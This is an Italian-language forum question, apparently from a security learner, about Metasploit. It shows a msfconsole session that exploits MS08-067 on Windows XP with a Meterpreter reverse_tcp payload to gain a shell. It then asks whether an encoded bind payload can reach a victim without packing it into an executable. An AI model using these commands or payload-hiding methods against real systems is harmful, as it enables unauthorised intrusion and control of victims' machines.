Sono novizio in Metasploit. Sto ancora imparando le basi, ma sono confuso e vorrei un aiuto.
1) - In precedenza ho imparato come sfruttare semplicemente qualsiasi O.S. vulnerabilità usando meterpreter. Possiamo inviare un exploit al sistema di destinazione e creare un binding / reverse shell per il controllo. Esempio -
Hack windows xp con MS08-067 exploit
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.4
(Target)
RHOST => 192.168.1.4
msf exploit(ms08_067_netapi) > exploit
%codice%
meterpreter > sysinfo
Ora con i comandi sopra possiamo usare una shell di destinazione dalla macchina dell'attaccante. Non è necessario creare alcun exe per connettersi al sistema vulnerabile di destinazione. Meterpreter inietta automaticamente la memoria e possiamo ottenere shell.
2) -
Ora, quando usiamo un codificatore, dobbiamo creare un exe e legare il nostro carico all'interno dell'exe. Quando la vittima esegue questo exe possiamo ottenere la shell di sistema della vittima.
meterpreter > shell
Per sfruttare il sistema della vittima dobbiamo trasferire questo exe al loro sistema.
Domanda:
In precedenza non abbiamo bisogno di alcun exe per sfruttare un sistema, ma con l'uso di un codificatore abbiamo bisogno di un exe per nascondere il payload. Possiamo semplicemente codificare il nostro payload meterpreter tcp_bind senza exe e inviarlo al sistema delle vittime?
Qualsiasi aiuto davvero apprezzabile.